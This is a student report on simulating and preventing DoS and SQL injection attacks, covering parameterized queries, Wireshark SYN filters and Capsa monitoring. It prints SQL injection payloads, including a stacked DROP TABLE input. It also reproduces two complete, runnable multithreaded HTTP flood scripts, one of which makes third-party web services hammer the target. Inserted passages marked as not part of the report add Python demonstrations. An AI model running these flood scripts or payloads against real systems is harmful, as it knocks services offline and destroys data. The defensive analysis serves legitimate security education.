Simulation & Prevention of DoS Attacks and SQL Injection: Information Security Analysis and Audit
PROJECT REPORT
Submitted by-
Introduction
DDoS Attack
A distributed denial-of-service (DDoS) attack occurs when multiple systems flood the
bandwidth or resources of a targeted system, usually one or more web servers. Such an
attack is often the result of multiple compromised systems (for example, a botnet) flooding
the targeted system with traffic. When a server is overloaded with connections, new
connections can no longer be accepted. The major advantages to an attacker of using a
distributed denial-of-service attack are that multiple machines can generate more attack
traffic than one machine, multiple attack machines are harder to turn off than one attack
machine, and the behaviour of each attack machine can be stealthier, making it harder to
track and shut down.
SQL Injection
SQL injection is a code injection technique, used to attack data-driven applications, in which
malicious SQL statements are inserted into an entry field for execution (e.g. to dump the
database contents to the attacker). SQL injection must exploit a security vulnerability in an
application's software, for example, when user input is either incorrectly filtered for string
literal escape characters embedded in SQL statements or user input is not strongly typed and
unexpectedly executed. SQL injection attacks allow attackers to spoof identity, tamper with
existing data, cause repudiation issues such as voiding transactions or changing balances,
allow the complete disclosure of all data on the system, destroy the data or make it otherwise
unavailable, and become administrators of the database server.
Usually, attackers use a special character such as the single quote (') to check whether SQL
injection is possible on the system. For example, suppose the internal SQL query of the system is
"SELECT * FROM User WHERE username = '" + username + "';" and the attacker's input is "evil's".
This generates the SQL query SELECT * FROM User WHERE username = 'evil's', which causes a
syntax error when the query is executed on the database. Once the attacker has found this security
bug in the system, he can use it to carry out further SQL injections that modify the system
maliciously.
Problem Statement
1. The Open Web Application Security Project (OWASP), the globally recognized
standard awareness document for developers and web application security,
consistently points out that database injection and Denial of Service (DoS) attacks
are the greatest security risks to modern web applications.
2. Acknowledging these growing web security risks, we aim to suggest security
patches that can help safeguard organizations and critical information.
Literature Review:
Aim
Simulate DoS and SQL injection attacks, observe system/application behaviour during the
attack period, and then suggest and recommend robust defence and detection mechanisms
against DDoS attacks and SQL injection.
Software Used
• Colasoft Capsa
• phpMyAdmin
• XAMPP
• Wireshark
Proposed Methodology
● DoS Attack Prevention: The project shall demonstrate the functionality of software tools
such as Colasoft Capsa, Capsa's Enterprise Edition and Capsa's Alarm Explorer to detect
and mitigate DoS attacks.
● SQL Injection Attack Simulation: To simulate an SQL injection, we plan on creating a
deliberately vulnerable webpage and accessing its database using phpMyAdmin and XAMPP.
● SQL Injection Attack Prevention: We plan on using prepared statements with variable
binding (also known as parameterized queries): all of the SQL code is defined first, and each
parameter is passed to the query later. This coding style allows the database to distinguish
between code and data, regardless of what user input is supplied, so an attacker is not able
to manipulate the intent of a query and gain access.
● DoS Attack Simulation: To simulate a DoS attack on a system in a given WiFi network, we
plan on using Wireshark to analyse the packets arriving at the target's device.
Implementation:
Prevention of SQLi:
We created a website of our own to show how attackers use vulnerable
user inputs to make an SQL injection attack succeed. After that, we used
parameterized queries in our SQL statements to stop attackers from taking
down our website.
Fig 5 & 6- The attacker tries to manipulate the SQL command to access the database by entering
' or '1'='1, which turns the query into one containing an "or" condition that is always true, so the
database returns all the records.
Another example of what SQL injection can do:
Fig 7 & 8- Suppose that instead of the mysqli_query function we use the mysqli_multi_query function.
Clearly, the input ; DROP TABLE important; SELECT * FROM 'users' where '1' = '1 contains more than
one query. One of these queries makes the database drop the table called "important".
Fig 9- Prepared statements ensure that an attacker is not able to manipulate the intent of a query
and gain access.
Fig 10 & 11- The following screenshots demonstrate how such prepared code fragments limit
access to the database.
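The quote probe from the Introduction and the three behaviours captioned in Figs 5-11 (the always-true "or" condition, the stacked DROP TABLE query under a multi-statement API, and the prepared statement that defeats both), as an added example that is not part of the report. It uses Python's sqlite3 module with a constructed in-memory users table instead of the report's PHP/MySQL page; the single-statement execute() call stands in for mysqli_query and executescript() for mysqli_multi_query, and the function names and sample rows are this example's own.

```python
import sqlite3


def make_db():
    """Constructed sample database standing in for the project's MySQL tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("CREATE TABLE important (id INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    conn.commit()
    return conn


def table_exists(conn, name):
    row = conn.execute("SELECT name FROM sqlite_master WHERE type='table' AND name=?",
                       (name,)).fetchone()
    return row is not None


def login_vulnerable(conn, username, password, multi=False):
    """Query built by string concatenation, like the report's vulnerable page.
    multi=False mirrors mysqli_query (one statement only);
    multi=True mirrors mysqli_multi_query (every statement in the string runs)."""
    sql = ("SELECT * FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    if multi:
        conn.executescript(sql)   # runs all statements, discards SELECT results
        return []
    return conn.execute(sql).fetchall()


def login_prepared(conn, username, password):
    """Prepared statement with bound parameters: the input is always data, never SQL."""
    sql = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


def demo():
    r = {}
    conn = make_db()

    # Quote probe from the Introduction: the stray quote breaks the statement.
    try:
        login_vulnerable(conn, "evil's", "x")
        r["quote_probe"] = "no error"
    except sqlite3.OperationalError:
        r["quote_probe"] = "syntax error"
    r["quote_probe_prepared"] = len(login_prepared(conn, "evil's", "x"))

    # Fig 5 & 6: an always-true "or" condition returns every row.
    tautology = "' or '1'='1"
    r["tautology_vulnerable"] = len(login_vulnerable(conn, tautology, tautology))
    r["tautology_prepared"] = len(login_prepared(conn, tautology, tautology))

    # Fig 7 & 8: stacked statements, modelled on the report's payload.
    stacked = "'; DROP TABLE important; SELECT * FROM users WHERE '1'='1"
    try:
        login_vulnerable(conn, stacked, "x")        # single-statement API refuses it
        r["stacked_single"] = "executed"
    except (sqlite3.ProgrammingError, sqlite3.Warning):
        r["stacked_single"] = "rejected"
    r["table_after_single"] = table_exists(conn, "important")
    login_vulnerable(conn, stacked, "x", multi=True)  # multi-statement API runs all three
    r["table_after_multi"] = table_exists(conn, "important")

    # Fig 9-11: the same payload bound as a parameter is just an odd username.
    conn2 = make_db()
    r["stacked_prepared"] = len(login_prepared(conn2, stacked, "x"))
    r["table_after_prepared"] = table_exists(conn2, "important")
    return r


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

Two points the run makes concrete: a single-statement API already blocks the stacked query (so mysqli_multi_query widens the blast radius for no benefit on a login form), but only the bound parameter stops the tautology, which is a single, syntactically valid statement.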
After attack:
Code:
1)
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Imports were dropped when the script was pasted into the report; these are the ones it uses.
import sys
import time
import socket
import random
import logging
import threading
import urllib.request
from queue import Queue
from optparse import OptionParser


def user_agent():
    # Pool of User-Agent strings picked at random for each request
    global uagent
    uagent = []
    uagent.append("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14")
    uagent.append("Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0")
    uagent.append("Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3")
    uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
    uagent.append("Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7")
    uagent.append("Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
    uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1")
    return uagent


def my_bots():
    # Third-party services that fetch a URL on request; the target URL is appended to each
    global bots
    bots = []
    bots.append("http://validator.w3.org/check?uri=")
    bots.append("http://www.facebook.com/sharer/sharer.php?u=")
    return bots


def bot_hammering(url):
    # Repeatedly asks one of the third-party services to fetch the target
    try:
        while True:
            req = urllib.request.urlopen(urllib.request.Request(url, headers={'User-Agent': random.choice(uagent)}))
            print("\033[94mbot is hammering...\033[0m")
            time.sleep(.1)
    except:
        time.sleep(.1)


def down_it(item):
    # Opens a TCP connection, sends one request built from headers.txt, then shuts it down
    try:
        while True:
            packet = str("GET / HTTP/1.1\nHost: " + host + "\n\n User-Agent: " + random.choice(uagent) + "\n" + data).encode('utf-8')
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((host, int(port)))
            if s.sendto(packet, (host, int(port))):
                s.shutdown(1)
                print("\033[92m", time.ctime(time.time()), "\033[0m \033[94m <-- packet sent! hammering--> \033[0m")
            else:
                s.shutdown(1)
                print("\033[91mshut<->down\033[0m")
            time.sleep(.1)
    except socket.error as e:
        print("\033[91mno connection! server maybe down\033[0m")
        # print("\033[91m", e, "\033[0m")
        time.sleep(.1)


def dos():
    # Worker thread: takes a task from queue q and runs down_it
    while True:
        item = q.get()
        down_it(item)
        q.task_done()


def dos2():
    # Worker thread: takes a task from queue w and runs bot_hammering
    while True:
        item = w.get()
        bot_hammering(random.choice(bots) + "http://" + host)
        w.task_done()


def usage():
    print(''' \033[92m Hammer Dos Script v.1 http://www.canyalcin.com/
 It is the end user's responsibility to obey all applicable laws.
 It is just for server testing script. Your ip is visible. \n
 usage : python3 hammer.py [-s] [-p] [-t]
 -h : help
 -s : server ip
 -p : port default 80
 -t : turbo default 135 \033[0m''')
    sys.exit()


def get_parameters():
    global host
    global port
    global thr
    global item
    optp = OptionParser(add_help_option=False, epilog="Hammers")
    optp.add_option("-q", "--quiet", help="set logging to ERROR", action="store_const",
                    dest="loglevel", const=logging.ERROR, default=logging.INFO)
    optp.add_option("-s", "--server", dest="host", help="attack to server ip -s ip")
    optp.add_option("-p", "--port", type="int", dest="port", help="-p 80 default 80")
    optp.add_option("-t", "--turbo", type="int", dest="turbo", help="default 135 -t 135")
    optp.add_option("-h", "--help", dest="help", action='store_true', help="help you")
    opts, args = optp.parse_args()
    logging.basicConfig(level=opts.loglevel, format='%(levelname)-8s %(message)s')
    if opts.help:
        usage()
    if opts.host is not None:
        host = opts.host
    else:
        usage()
    if opts.port is None:
        port = 80
    else:
        port = opts.port
    if opts.turbo is None:
        thr = 135
    else:
        thr = opts.turbo


# reading headers
global data
headers = open("headers.txt", "r")
data = headers.read()
headers.close()

# task queues are q, w
q = Queue()
w = Queue()

if __name__ == '__main__':
    if len(sys.argv) < 2:
        usage()
    get_parameters()
    print("\033[92m", host, " port: ", str(port), " turbo: ", str(thr), "\033[0m")
    print("\033[94mPlease wait...\033[0m")
    user_agent()
    my_bots()
    time.sleep(5)
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, int(port)))
        s.settimeout(1)
    except socket.error as e:
        print("\033[91mcheck server ip and port\033[0m")
        usage()
    while True:
        for i in range(int(thr)):
            t = threading.Thread(target=dos)
            t.daemon = True  # if thread is exist, it dies
            t.start()
            t2 = threading.Thread(target=dos2)
            t2.daemon = True  # if thread is exist, it dies
            t2.start()
        start = time.time()
        # tasking
        item = 0
        while True:
            if (item > 1800):  # for no memory crash
                item = 0
                time.sleep(.1)
            item = item + 1
            q.put(item)
            w.put(item)
        q.join()
        w.join()
2)
import socket
import threading

# The report does not show how these three values were set; placeholders stand in for them.
target = "TARGET_HOST_PLACEHOLDER"   # placeholder: host used in the simulation
port = 80                            # placeholder: port used in the simulation
fake_ip = "FAKE_IP_PLACEHOLDER"      # placeholder: value sent in the Host header
attack_num = 0


def attack():
    # Each thread loops: connect, send a two-part request, close, count
    global attack_num
    while True:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target, port))
        s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port))
        s.close()
        attack_num += 1
        print(attack_num)


for i in range(500):
    thread = threading.Thread(target=attack)
    thread.start()
Detection using Wireshark:
Look out for an immense number of TCP connection requests. The proper display filter is
tcp.flags.syn == 1 and tcp.flags.ack == 0
The server under attack will respond with a smaller number of SYN/ACKs. These can be
spotted with the display filter tcp.flags.syn == 1 and tcp.flags.ack == 1. Compare the
number of SYNs with the number of SYN/ACKs: as long as the numbers are identical, your
firewall or server is holding up.
Fig 12 & 13- Since, in the above case, the numbers are identical, the firewall/server is doing a
good job of keeping the system safe.
-We can also view Wireshark's graphs for a visual representation of the uptick in
traffic.
-The overview of your network will make spikes in traffic quickly noticeable. You
should be able to notice an uptick in the global utilization graph, as well as in the total
traffic by bytes.
-During flooding, it shows a massive spike in overall packets, from near 0 to about a
thousand packets a second.
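The SYN versus SYN/ACK comparison above, as an added example that is not part of the report: the two display filters are rewritten as tests on the TCP flag bits and run over a constructed packet list rather than a real capture, and the per-second count gives the "packets a second" spike the graphs show. The function names, the 10.0.0.x/192.0.2.x addresses and the timings are this example's own assumptions.

```python
from collections import Counter

# TCP flag bits as Wireshark exposes them through tcp.flags
SYN = 0x02
ACK = 0x10


def is_syn(flags):
    """Same packets as the display filter tcp.flags.syn == 1 and tcp.flags.ack == 0."""
    return bool(flags & SYN) and not (flags & ACK)


def is_syn_ack(flags):
    """Same packets as the display filter tcp.flags.syn == 1 and tcp.flags.ack == 1."""
    return bool(flags & SYN) and bool(flags & ACK)


def syn_summary(packets, server_ip):
    """Count SYNs sent to the server against SYN/ACKs it answered, plus the peak packet rate.
    Each packet is a dict with ts (seconds), src, dst and flags."""
    syn = sum(1 for p in packets if p["dst"] == server_ip and is_syn(p["flags"]))
    syn_ack = sum(1 for p in packets if p["src"] == server_ip and is_syn_ack(p["flags"]))
    per_second = Counter(int(p["ts"]) for p in packets)
    return {
        "syn": syn,
        "syn_ack": syn_ack,
        "unanswered": syn - syn_ack,        # backlog the server could not answer
        "peak_pps": max(per_second.values()),
        "holding_up": syn == syn_ack,       # the report's rule of thumb
    }


def constructed_capture():
    """Constructed sample capture (not a real trace): three normal handshakes in the
    first second, then a burst of 40 SYNs at t=2 of which the server answers only 12."""
    server = "10.0.0.5"
    pkts = []
    for i, client in enumerate(["10.0.0.11", "10.0.0.12", "10.0.0.13"]):
        pkts.append({"ts": 0.1 * i, "src": client, "dst": server, "flags": SYN})
        pkts.append({"ts": 0.1 * i + 0.01, "src": server, "dst": client, "flags": SYN | ACK})
        pkts.append({"ts": 0.1 * i + 0.02, "src": client, "dst": server, "flags": ACK})
    for i in range(40):
        pkts.append({"ts": 2.0 + i * 0.001, "src": "192.0.2.%d" % (i % 10 + 1),
                     "dst": server, "flags": SYN})
    for i in range(12):
        pkts.append({"ts": 2.05 + i * 0.001, "src": server,
                     "dst": "192.0.2.%d" % (i % 10 + 1), "flags": SYN | ACK})
    return server, pkts


if __name__ == "__main__":
    server, pkts = constructed_capture()
    print("whole capture:", syn_summary(pkts, server))
    print("first second only:", syn_summary([p for p in pkts if p["ts"] < 1.0], server))
```

Run on the whole constructed capture the summary reports 43 SYNs against 15 SYN/ACKs, so holding_up is False and the 28 unanswered SYNs are the sign the report describes; restricted to the quiet first second the counts match (3 and 3), which is the Fig 12 & 13 situation. On a real trace the same two predicates can be applied to the flag field of each TCP packet exported from Wireshark.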
Using Colasoft Capsa:
DoS attacks are easy to recognise but extremely difficult to mitigate on a personal device.
Software tools like Colasoft Capsa make it easy and quick to detect and locate network
attacks. The first port of call for detecting a DoS attack is the dashboard. The overview of
your network will make spikes in traffic quickly noticeable. You should be able to notice an
uptick in the global utilization graph, as well as in the total traffic by bytes:
Admins can use Capsa's Alarm Explorer to get an instant notification when unusual traffic
is detected:
Alternatively, Capsa's Enterprise Edition allows system/network administrators to
immediately start a security analysis profile, which has a dedicated DoS attack tab. It also
lets admins look at TCP conversation details to quickly decode and verify attacks:
Going further, we would like to remind the reader of the illegal and unpredictable nature of
a DoS/DDoS attack. Some other general security recommendations for networks and
businesses are stated as follows:
Conclusion
SQL injection and DoS attacks are two vastly different modes of attack that have time and
again jeopardised businesses because of their tendency to be extremely invasive and highly
unpredictable. Through this project, we have attempted to simulate the two dangerous attacks
in well-monitored and legal environments to gain deep insight into their functioning. Our
observations have led us to conclude that conducting such attacks becomes difficult only if the
target's device has proper, well-functioning network security mechanisms in place.
Acknowledging this has led us to make practical security recommendations to help better
safeguard networks and devices.
Future prospects
Cyber attacks like SQL injection and DoS pose a great threat to all existing websites that
make use of SQL databases. Hence, it is extremely important to research both cases further
to make sure that databases with sensitive information, complex network architectures
and personal devices stay secure.
In the case of SQL injection, the adopted design can be improved to incorporate features that
prevent attackers from signing up, using the database and accessing content. Various
code injection techniques may be developed over time, and the security mechanisms must
constantly evolve to make sure that each of these fraudulent attempts is prevented. In
addition, different layers of access based on authorisation could be incorporated to
ensure confidentiality at each level. Owing to their highly unpredictable nature, DoS attacks
can take organisations completely by surprise. It is important to support and promote the
evolution of network security tools, to make sure such incidents are taken seriously as
cyber security violations, and to distribute free tools to small businesses and other networks
for additional protection.